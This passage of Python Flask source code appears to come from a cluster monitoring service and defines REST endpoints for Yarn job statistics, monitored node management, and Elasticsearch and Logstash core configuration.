app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
return yarnJobs
@dmon.route('/v1/overlord/history/yarn/jobs')
class YarnHistoryServerJobs(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
try:
jStatJob = getYarnJobsStatistic(qBDService.yarnHEnd, qBDService.yarnHPort, yarnJobs)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
#TODO: Stronger sync index with logstash server needed
# dindex = 'logstash-%s' %datetime.now().strftime("%Y.%m.%d")
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'ES not registered'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES core not registered into dmon', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
rIndex = dmonESIndexer(qES.hostIP, dmonindex='ystat', dmondoc_type='yarn_jobstat', docId='yarn-jobstat', body=jStatJob)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Indexing failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error while indexing'})
response.status_code = 503
return response
app.logger.info('[%s] : [INFO] Jobs indexed %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rIndex))
# return rIndex
return jStatJob
@dmon.route('/v1/overlord/history/yarn/jobs/tasks')
class YarnHistoryServerJobTasks(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
try:
jStatTask = getYarnJobTasks(qBDService.yarnHEnd, qBDService.yarnHPort, yarnJobs)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'ES not registered'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES core not registered into dmon', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
rIndex = dmonESIndexer(qES.hostIP, dmonindex='ystat', dmondoc_type='yarn_jobstasks', docId='yarn-jobstasks', body=jStatTask)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Indexing failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error while indexing'})
response.status_code = 503
return response
app.logger.info('[%s] : [INFO] Jobs indexed %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rIndex))
# return rIndex
return jStatTask
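# Both /history/yarn/jobs and /history/yarn/jobs/tasks follow the same pattern: fetch job
# data from the Yarn History server, then index the aggregated statistics into the master
# Elasticsearch instance under the 'ystat' index before returning the payload to the caller.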
@dmon.route('/v1/overlord/nodes/<nodeFQDN>')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class MonitoredNodeInfo(Resource):
def get(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
response = jsonify({
'NodeName': qNode.nodeFQDN,
'Status': qNode.nStatus,
'IP': qNode.nodeIP,
'Monitored': qNode.nMonitored,
'OS': qNode.nodeOS,
'Key': qNode.nkey,
'Roles': qNode.nRoles,
'LSInstance': qNode.nLogstashInstance
})
response.status_code = 200
app.logger.info(
'[%s] : [INFO] Node info -> Status:%s, IP:%s, Monitored:%s, OS:%s, LSInstance: %s, Key:%s, Roles:%s, ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qNode.nStatus,
qNode.nodeIP, qNode.nMonitored, qNode.nodeOS, qNode.nLogstashInstance, qNode.nkey,
str(qNode.nRoles))
return response
@api.expect(nodeUpdate)
def put(self, nodeFQDN):
if not request.json:
app.logger.warning('[%s] : [WARN] Malformed request, not json',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
abort(400)
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
nLSI = ''
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
qNode.nodeIP = request.json['IP']
qNode.nodeOS = request.json['OS']
if 'Key' not in request.json:
app.logger.warning('[%s] : [WARN] Key not changed for node %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
else:
qNode.nkey = request.json['Key']
qNode.nPass = request.json['Password']
qNode.nUser = request.json['User']
if 'LogstashInstance' not in request.json:
qLSCore = dbNodes.query.first()
if qLSCore is None:
nLSI = 'None'
else:
nLSI = qLSCore.hostIP
else:
nLSI = request.json['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance changed for node %s from %s to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qNode.nodeFQDN, qNode.nLogstashInstance, nLSI)
response = jsonify({'Status': 'Node ' + nodeFQDN + ' updated!'})
qNode.nLogstashInstance = nLSI
response.status_code = 201
return response
def delete(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
nodeID = qNode.nodeFQDN
status = 0
node = []
node.append(qNode.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if qNode.nStatus:
resourceCheck = agentr.check()
r = None
try:
r = requests.get(resourceCheck[0], timeout=DMON_TIMEOUT)
except requests.exceptions.Timeout:
app.logger.warning('[%s] : [WARN] Agent on node %s timed out',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
except requests.exceptions.ConnectionError:
app.logger.error('[%s] : [ERROR] Agent on node %s connection error',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
if r is not None and r.status_code == 200:
resourceList = agentr.shutdownAgent()
try:
requests.post(resourceList[0], timeout=DMON_TIMEOUT)
except requests.exceptions.Timeout:
app.logger.warning('[%s] : [WARN] Agent on node %s timed out',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
status = 1
except requests.exceptions.ConnectionError:
app.logger.error('[%s] : [ERROR] Agent on node %s connection error',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
status = 2
db.session.delete(qNode)
db.session.commit()
response = jsonify({'Status': status,
'Node': nodeID,
'Message': 'Node successfully removed'})
response.status_code = 200
return response
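# Status values returned by the DELETE handler above: 0 - agent shut down cleanly (or the
# node was not marked active), 1 - the shutdown request timed out, 2 - the agent was
# unreachable; in all cases the node record itself is removed from the database.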
@dmon.route('/v1/overlord/nodes/list')
class ClusterNodeListDelete(Resource):
@api.expect(nodeDelList)
def delete(self):
if not request.json:
app.logger.warning('[%s] : [WARN] Malformed request, not json',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
abort(400)
listNodes = request.json['Nodes']
invalidNodes = []
validNodes = {}
validNodesList = []
for n in listNodes:
qNode = dbNodes.query.filter_by(nodeFQDN=n).first()
if qNode is None:
invalidNodes.append(n)
else:
validNodes[n] = qNode.nodeIP
validNodesList.append(qNode.nodeIP)
agentr = AgentResourceConstructor(validNodesList, '5222')
resourceShutDown = agentr.shutdownAgent()
dmon = GreenletRequests(resourceShutDown)
nodeRes = dmon.parallelPost(None)
failedNodes = {}
successNodes = {}
for res in nodeRes:
nodeIP = urlparse(res['Node'])
if res['StatusCode'] == 200:
for k, v in validNodes.iteritems():
if v == nodeIP.hostname:
successNodes[k] = v
else:
for k, v in validNodes.iteritems():
if v == nodeIP.hostname:
failedNodes[k] = v
for nod in validNodesList:
qNodeDel = dbNodes.query.filter_by(nodeIP=nod).first()
db.session.delete(qNodeDel)
db.session.commit()
response = jsonify({'Valid': validNodes, 'Invalid': invalidNodes, 'Stopped': successNodes, 'Unavailable': failedNodes})
response.status_code = 200
dmon.reset()
return response
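# Illustrative DELETE body for /v1/overlord/nodes/list (node names are assumptions):
#   {"Nodes": ["node1.example.com", "node2.example.com"]}
# Unknown nodes are reported under 'Invalid'; the rest are shut down in parallel and split
# into 'Stopped' and 'Unavailable' depending on the agent response.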
@dmon.route('/v1/overlord/nodes/<nodeFQDN>/roles')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class ClusterNodeRoles(Resource):
@api.expect(nodeRoles)
def put(self, nodeFQDN): # TODO validate role names
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
listRoles = request.json['Roles']
qNode.nRoles = ', '.join(map(str, listRoles))
response = jsonify({'Status': 'Node ' + nodeFQDN + ' roles updated!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Node %s roles %s added.',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN,
str(qNode.nRoles))
return response
# def post(self, nodeFQDN): #TODO -> is this required
# return 'Redeploy configuration for node ' + nodeFQDN + '!'
@dmon.route('/v1/overlord/nodes/<nodeFQDN>/purge')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class PurgeNode(Resource):
def delete(self, nodeFQDN):
qPurge = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qPurge is None:
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
abort(404)
lPurge = []
lPurge.append(qPurge.nodeIP)
try:
serviceCtrl(lPurge, qPurge.nUser, qPurge.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Error': 'Stopping LSF!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] While stopping LSF on %s with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN, type(inst),
inst.args)
return response
try:
serviceCtrl(lPurge, qPurge.nUser, qPurge.nPass, 'collectd', 'stop')
except Exception as inst:
response = jsonify({'Error': 'Stopping collectd!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] While stopping collectd on %s with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN, type(inst),
inst.args)
return response
try:
stopAgent(lPurge, qPurge.nUser, qPurge.nPass)
except Exception as inst:
response = jsonify({'Status': 'Error Stopping agent on ' + qPurge.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Error stopping agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qPurge.nodeFQDN), type(inst), inst.args)
return response
try:
purgeAgent(lPurge, qPurge.nUser, qPurge.nPass)
except Exception as inst:
response = jsonify({'Status': 'Error deleting agent on ' + qPurge.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Error deleting agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qPurge.nodeFQDN), type(inst), inst.args)
return response
db.session.delete(qPurge)
db.session.commit()
response = jsonify({'Status': 'Node ' + nodeFQDN + ' deleted!'})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node %s deleted',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
@dmon.route('/v1/overlord/core/es/config') # TODO use args for unsafe cfg file upload
class ESCoreConfiguration(Resource):
def get(self): # TODO same for all get config file createfunction
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] Config dir not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if not os.path.isfile(os.path.join(cfgDir, 'elasticsearch.yml')):
response = jsonify({'Status': 'Config file not found !'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES config file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
esCfgfile = open(os.path.join(cfgDir, 'elasticsearch.yml'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] ES config file failed to open',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(esCfgfile, mimetype='text/yaml', as_attachment=True)
@api.expect(esCore)
def put(self):
requiredKeys = ['ESClusterName', 'HostFQDN', 'NodeName']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed Request, missing key(s)',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(hostFQDN=request.json['HostFQDN']).first()
if 'IP' not in request.json:
ip = '127.0.0.1'
else:
ip = request.json['IP']
if 'NodePort' not in request.json:
nodePort = 9200
else:
nodePort = request.json['NodePort']
if 'OS' not in request.json:
os = "unknown"
else:
os = request.json["OS"]
if 'ESCoreHeap' not in request.json:
ESHeap = '4g'
else:
ESHeap = request.json['ESCoreHeap']
check, value = sysMemoryCheck(ESHeap)
if not check:
app.logger.warning('[%s] : [WARN] ES Core service heapsize modified to %s instead of %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(value), str(ESHeap))
ESHeap = value
if 'DataNode' not in request.json:
data = 1
else:
data = request.json['DataNode']
if 'NumOfShards' not in request.json:
shards = 1
else:
shards = request.json['NumOfShards']
if 'NumOfReplicas' not in request.json:
rep = 0
else:
rep = request.json['NumOfReplicas']
if 'FieldDataCacheSize' not in request.json:
fdcs = '20%'
else:
fdcs = request.json['FieldDataCacheSize']
if 'FieldDataCacheExpires' not in request.json:
fdce = '6h'
else:
fdce = request.json['FieldDataCacheExpires']
if 'FieldDataCacheFilterSize' not in request.json:
fdcfs = '20%'
else:
fdcfs = request.json['FieldDataCacheFilterSize']
if 'FieldDataCacheFilterExpires' not in request.json:
fdcfe = '6h'
else:
fdcfe = request.json['FieldDataCacheFilterExpires']
if 'IndexBufferSize' not in request.json:
ibs = '30%'
else:
ibs = request.json['IndexBufferSize']
if 'MinShardIndexBufferSize' not in request.json:
msibs = '12mb'
else:
msibs = request.json['MinShardIndexBufferSize']
if 'MinIndexBufferSize' not in request.json:
mibs = '96mb'
else:
mibs = request.json['MinIndexBufferSize']
test = db.session.query(
dbESCore.hostFQDN).all() # TODO: it always sets the first node to master need to fix future version
if not test:
master = 1
app.logger.info('[%s] : [INFO] First ES host set to Master',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
master = 0
app.logger.info('[%s] : [INFO] ES host set to Slave',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if qESCore is None:
upES = dbESCore(hostFQDN=request.json["HostFQDN"], hostIP=ip, hostOS=os,
nodeName=request.json["NodeName"], clusterName=request.json["ESClusterName"],
conf='None', nodePort=nodePort, MasterNode=master, DataNode=data,
ESCoreHeap=ESHeap, NumOfShards=shards, NumOfReplicas=rep, FieldDataCacheSize=fdcs,
FieldDataCacheExpires=fdce, FieldDataCacheFilterSize=fdcfs,
FieldDataCacheFilterExpires=fdcfe, IndexBufferSize=ibs, MinShardIndexBufferSize=msibs,
MinIndexBufferSize=mibs)
db.session.add(upES)
db.session.commit()
response = jsonify({'Added': 'ES Config for ' + request.json["HostFQDN"]})
response.status_code = 201
app.logger.info(
'[%s] : [INFO] ES config for %s set to: OS %s, NodeName %s, ClusterName %s, Port %s, Heap %s, Shards %s, Replicas %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), request.json["HostFQDN"], os,
request.json["NodeName"], request.json["ESClusterName"], str(nodePort),
ESHeap, shards, rep)
return response
else:
# qESCore.hostFQDN =request.json['HostFQDN'] #TODO document hostIP and FQDN may not change in README.md
qESCore.hostOS = os
qESCore.nodeName = request.json['NodeName']
qESCore.clusterName = request.json['ESClusterName']
if 'IP' not in request.json:
# print >> sys.stderr, 'IP unchanged'
app.logger.info('[%s] : [INFO] IP unchanged', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['IP'] == ip:
qESCore.hostIP = ip
if 'NodePort' not in request.json:
# print >> sys.stderr, 'NodePort unchanged'
app.logger.info('[%s] : [INFO] NodePort unchanged', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NodePort'] == nodePort:
qESCore.nodePort = nodePort
if 'DataNode' not in request.json:
# print >> sys.stderr, 'DataNode unchanged'
app.logger.info('[%s] : [INFO] DataNode unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['DataNode'] == data:
qESCore.DataNode = data
# print >> sys.stderr, 'DataNode set to ' + str(data)
app.logger.info('[%s] : [INFO] DataNode set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(data))
if 'ESCoreHeap' not in request.json:
# print >> sys.stderr, 'ESCoreHeap unchanged'
app.logger.info('[%s] : [INFO] ESCoreHeap unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['ESCoreHeap'] == ESHeap:
qESCore.ESCoreHeap = ESHeap
# print >> sys.stderr, 'ESCoreHeap set to ' + ESHeap
app.logger.info('[%s] : [INFO] ESCoreHeap set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ESHeap)
if 'NumOfShards' not in request.json:
# print >> sys.stderr, 'NumOfShards unchanged'
app.logger.info('[%s] : [INFO] NumOfShards unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NumOfShards'] == shards:
qESCore.NumOfShards = shards
# print >> sys.stderr, 'NumOfShards set to ' + str(shards)
app.logger.info('[%s] : [INFO] NumOfShards set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(shards))
if 'NumOfReplicas' not in request.json:
# print >> sys.stderr, 'NumOfReplicas unchanged'
app.logger.info('[%s] : [INFO] NumOfReplicas unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NumOfReplicas'] == rep:
qESCore.NumOfReplicas = rep
# print >> sys.stderr, 'NumOfReplicas set to ' + str(rep)
app.logger.info('[%s] : [INFO] NumOfReplicas set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rep))
if 'FieldDataCacheSize' not in request.json:
# print >> sys.stderr, 'FieldDataCacheSize unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheSize'] == fdcs:
qESCore.FieldDataCacheSize = fdcs
# print >> sys.stderr, 'FieldDataCacheSize set to ' + fdcs
app.logger.info('[%s] : [INFO] FieldDataCacheSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcs)
if 'FieldDataCacheExpires' not in request.json:
# print >> sys.stderr, 'FieldDataCacheExpires unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheExpires unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheExpires'] == fdce:
qESCore.FieldDataCacheExpires = fdce
app.logger.info('[%s] : [INFO] FieldDataCacheExpires set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdce)
# print >> sys.stderr, 'FieldDataCacheExpires set to ' + fdce
if 'FieldDataCacheFilterSize' not in request.json:
# print >> sys.stderr, 'FieldDataCacheFilterSize unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheFilterSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheFilterSize'] == fdcfs:
qESCore.FieldDataCacheFilterSize = fdcfs
# print >> sys.stderr, 'FieldDataCacheFilterSize set to ' + fdcfs
app.logger.info('[%s] : [INFO] FieldDataCacheFilterSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcfs)
if 'FieldDataCacheFilterExpires' not in request.json:
# print >> sys.stderr, 'FieldDataCacheFilterExpires unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheFilterExpires unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheFilterExpires'] == fdcfe:
qESCore.FieldDataCacheFilterExpires = fdcfe
# print >> sys.stderr, 'FieldDataCacheFilterExpires set to ' + fdcfe
app.logger.info('[%s] : [INFO] FieldDataCacheFilterExpires set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcfe)
if 'IndexBufferSize' not in request.json:
# print >> sys.stderr, 'IndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] IndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['IndexBufferSize'] == ibs:
qESCore.IndexBufferSize = ibs
# print >> sys.stderr, 'IndexBufferSize set to ' + ibs
app.logger.info('[%s] : [INFO] IndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ibs)
if 'MinShardIndexBufferSize' not in request.json:
# print >> sys.stderr, 'MinShardIndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] MinShardIndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['MinShardIndexBufferSize'] == msibs:
qESCore.MinShardIndexBufferSize = msibs
# print >> sys.stderr, 'MinShardIndexBufferSize set to ' + msibs
app.logger.info('[%s] : [INFO] MinShardIndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), msibs)
if 'MinIndexBufferSize' not in request.json:
# print >> sys.stderr, 'MinIndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] MinIndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['MinIndexBufferSize'] == mibs:
qESCore.MinIndexBufferSize = mibs
# print >> sys.stderr, 'MinIndexBufferSize set to ' + mibs
app.logger.info('[%s] : [INFO] MinIndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), mibs)
db.session.commit()
response = jsonify({'Updated': 'ES config for ' + request.json["HostFQDN"]})
response.status_code = 201
app.logger.info('[%s] : [INFO] Updated ES config with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(request.json))
return response
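# Illustrative PUT body for /v1/overlord/core/es/config (values are assumptions; only
# ESClusterName, HostFQDN and NodeName are required, everything else falls back to the
# defaults assigned above, e.g. NodePort 9200, ESCoreHeap '4g', NumOfShards 1, NumOfReplicas 0):
#   {"ESClusterName": "monitoring", "HostFQDN": "es-master.example.com",
#    "NodeName": "esCoreMaster", "IP": "10.0.0.20", "DataNode": 1}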
@dmon.route('/v1/overlord/core/es/<hostFQDN>')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESCoreRemove(Resource):
def delete(self, hostFQDN):
qESCorePurge = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCorePurge is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
try:
os.kill(qESCorePurge.ESCorePID, signal.SIGTERM)
except:
app.logger.warning('[%s] : [WARN] No ES instance with PID %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCorePurge.ESCorePID)
db.session.delete(qESCorePurge)
db.session.commit()
response = jsonify({'Status': 'Deleted ES at host ' + hostFQDN})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreRemove(Resource):
def delete(self, hostFQDN):
qLSCorePurge = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCorePurge is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
try:
os.kill(qLSCorePurge.LSCorePID, signal.SIGTERM)
except:
app.logger.warning('[%s] : [WARN] No LS instance with PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qLSCorePurge.LSCorePID)
db.session.delete(qLSCorePurge)
db.session.commit()
response = jsonify({'Status': 'Deleted LS at host ' + hostFQDN})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/es')
class ESCoreController(Resource):
def get(self):
hostsAll = db.session.query(dbESCore.hostFQDN, dbESCore.hostIP, dbESCore.hostOS, dbESCore.nodeName,
dbESCore.nodePort,
dbESCore.clusterName, dbESCore.ESCoreStatus, dbESCore.ESCorePID,
dbESCore.MasterNode, dbESCore.DataNode,
dbESCore.NumOfShards, dbESCore.NumOfReplicas, dbESCore.FieldDataCacheSize,
dbESCore.FieldDataCacheExpires, dbESCore.FieldDataCacheFilterSize,
dbESCore.FieldDataCacheFilterExpires, dbESCore.IndexBufferSize,
dbESCore.MinShardIndexBufferSize, dbESCore.MinIndexBufferSize,
dbESCore.ESCoreDebug, dbESCore.ESCoreHeap).all()
resList = []
for hosts in hostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['NodeName'] = hosts[3]
confDict['NodePort'] = hosts[4]
confDict['ESClusterName'] = hosts[5]
if checkPID(hosts[7]):
confDict['Status'] = hosts[6]
confDict['PID'] = hosts[7]
else:
app.logger.warning('[%s] : [WARN] ES Core service not found at PID %s, setting to failed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(hosts[7]))
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
if checkPID(esPIDf):
confDict['Status'] = 'detached'
confDict['PID'] = esPIDf
app.logger.warning('[%s] : [WARN] Detached ES Core service found at PID %s, setting to detached',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(esPIDf))
else:
#hosts.ESCorePID = 0
#hosts.ESCoreStatus = 'unknown'
# todo status detached if pid only in file not in sqlite, read pid from file
